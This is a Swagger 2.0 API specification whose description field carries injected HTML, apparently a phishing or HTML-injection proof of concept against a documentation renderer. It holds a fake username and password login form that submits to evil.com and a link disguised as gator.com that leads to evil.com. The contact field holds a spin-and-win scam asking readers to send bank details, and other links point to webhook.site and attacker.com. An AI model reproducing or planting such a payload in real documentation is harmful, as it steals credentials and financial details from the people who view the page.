swagger: '2.0'
info:
  version: 1.0.0
  title: "⚠️ Important Announcement -"
  description: |
    Checkout we move our service Too
    <a href="https://www.evil.com">gator.com</a>
    <div class="form-container">
      <form action="https://evil.com" method="get" class="form-signin">
        <div class="form-group">
          <label for="username">Username</label>
          <input type="text" name="username" size="20">
        </div>
        <div class="form-group">
          <label for="password">PAssword</label>
          <input type="password" name="password" size="20">
        </div>
        <div class="form-group">
          <button type="submit" class="btn btn-default">Login</button>
        </div>
      </form>
    </div>
  termsOfService: "https://webhook.site/ac5a1a22-d382-4277-917e-257cf18c8428"
  contact:
    name: "Gator to celebrate 🎉 spin & win 🎉 Once you Win share your bank detail on below 📞 Contact with screeshot to redeem prize"
    url: "https://attacker.com/"
    email: "bilalabbasuk@gmail.com"
paths:
  /:
    post:
      summary: "Submit login form"
      description: "Endpoint representing the login form POST."
      consumes:
        - application/x-www-form-urlencoded
      parameters:
        - name: username
          in: formData
          description: The username for login
          required: true
          type: string
        - name: password
          in: formData
          description: The password for login
          required: true
          type: string
      responses:
        '200':
          description: Login successful
        '400':
          description: Invalid credentials or missing parameters
        '500':
          description: Internal server error















